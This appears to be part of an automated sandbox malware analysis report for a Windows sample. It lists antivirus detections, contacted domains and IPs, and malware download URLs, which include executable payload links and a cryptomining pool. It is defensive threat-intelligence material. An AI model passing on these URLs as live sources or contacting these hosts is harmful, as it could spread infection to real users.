14.3.60C2.exe.2090000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.0.ujhcrda.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
41.2.B3BA.exe.250000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
20.0.B3BA.exe.370000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
36.2.szdcdkt.exe.670e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.0Cjy7Lkv1A.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.1.ujhcrda.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.2.B3BA.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145065
1.0.0Cjy7Lkv1A.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.0.B3BA.exe.9b0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
20.0.B3BA.exe.370000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
20.0.B3BA.exe.370000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
42.0.B3BA.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1145065
42.0.B3BA.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1145065
20.2.B3BA.exe.370000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
42.0.B3BA.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1145065
42.0.B3BA.exe.9b0000.7.unpack | 100% | Avira | HEUR/AGEN.1211353
14.0.60C2.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.7063.exe.480e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
42.0.B3BA.exe.9b0000.5.unpack | 100% | Avira | HEUR/AGEN.1211353
42.0.B3BA.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1145065
42.0.B3BA.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1145065
42.0.B3BA.exe.9b0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
41.0.B3BA.exe.250000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
13.0.ujhcrda.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.0.B3BA.exe.370000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
13.0.ujhcrda.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
36.3.szdcdkt.exe.690000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.2.ujhcrda.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.2.60C2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.0.B3BA.exe.9b0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
36.2.szdcdkt.exe.eb0000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
14.0.60C2.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.0.60C2.exe.2080e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.2.B3BA.exe.9b0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
19.2.A8FB.exe.550e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
41.0.B3BA.exe.250000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
39.2.svchost.exe.a50000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
41.0.B3BA.exe.250000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
1.0.0Cjy7Lkv1A.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.0.B3BA.exe.9b0000.9.unpack | 100% | Avira | HEUR/AGEN.1211353
12.2.ujhcrda.5315a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.0Cjy7Lkv1A.exe.4615a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
41.0.B3BA.exe.250000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
42.0.B3BA.exe.9b0000.13.unpack | 100% | Avira | HEUR/AGEN.1211353
14.0.60C2.exe.2080e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.3.A8FB.exe.570000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
42.0.B3BA.exe.9b0000.11.unpack | 100% | Avira | HEUR/AGEN.1211353
1.1.0Cjy7Lkv1A.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.0Cjy7Lkv1A.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.7063.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.2.A8FB.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://tempuri.org/ | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe
http://185.163.204.24/ | 4% | Virustotal |
http://185.163.204.24/ | 0% | Avira URL Cloud | safe
http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a4 | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe
http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e | 0% | Avira URL Cloud | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id24Response | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id13Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id22Response | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://get.adob | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id18Response | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id3Response | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 54.231.194.41 | true | false | | high
bitbucket.org | 104.192.141.1 | true | false | | high
pool-fr.supportxmr.com | 149.202.83.171 | true | false | | high
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 93.189.42.167 | true | false | | high
patmushta.info | 8.209.67.104 | true | false | | high
cdn.discordapp.com | 162.159.134.233 | true | false | | high
microsoft-com.mail.protection.outlook.com | 104.47.54.36 | true | false | | high
goo.su | 104.21.38.221 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
a0621298.xsph.ru | 141.8.194.74 | true | false | | high
data-host-coin-8.com | 93.189.42.167 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
pool.supportxmr.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://185.163.204.24/ | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
http://a0621298.xsph.ru/advert.msi | false | | high
http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a4 | false | Avira URL Cloud: safe | unknown
http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e | false | Avira URL Cloud: safe | unknown
http://a0621298.xsph.ru/9.exe | false | | high
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://a0621298.xsph.ru/45512.exe | false | | high
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://a0621298.xsph.ru/443.exe | false | | high
http://a0621298.xsph.ru/File.exe | false | | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/ac/?q= | B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id12Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/ | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id2Response | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id21Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_real | B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id15Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.373648113.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.391811922.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403574937.000000000095C000.00000004.00000020.sdmp | false | | high
https://api.ip.sb/ip | B3BA.exe, 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, B3BA.exe, 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmp | false | | high
http://crl.ver) | svchost.exe, 0000001C.00000002.527807876.0000023921EED000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.689092568.000001D6DA212000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id24Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_shockwave | B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id5Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id10Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id8Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_wmp | B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity | B3BA.exe, 0000002A.00000002.663930181.0000000002F30000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_java | B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/06/addressingex | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510 | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_divx | B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://www.tiktok.com/legal/report | svchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id13Response | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1 | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1 | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT | B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | false | |
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2002/12/policyB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://tempuri.org/Entity/Id22ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchB3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001C.00000003.498147484.00000239225A7000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498274252.0000023922A02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498236848.0000023922590000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498105135.00000239225A7000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/IssueB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://get.adobB3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/scB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://tempuri.org/Entity/Id18ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://service.real.com/realplayer/security/02062012_player/en/B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://disneyplus.com/legal.svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://tempuri.org/Entity/Id3ResponseB3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rmB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/actor/nextB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                            high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.163.45.70 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
104.47.54.36 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.21.38.221 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
93.189.42.167 | host-data-coin-11.com | Russian Federation | 41853 | NTCOM-ASRU | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
8.209.67.104 | patmushta.info | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true
141.8.194.74 | a0621298.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
185.163.204.22 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false
185.163.204.24 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false
162.159.134.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 552945
Start date: 13.01.2022
Start time: 23:27:23
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 5s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 0Cjy7Lkv1A.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 50
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
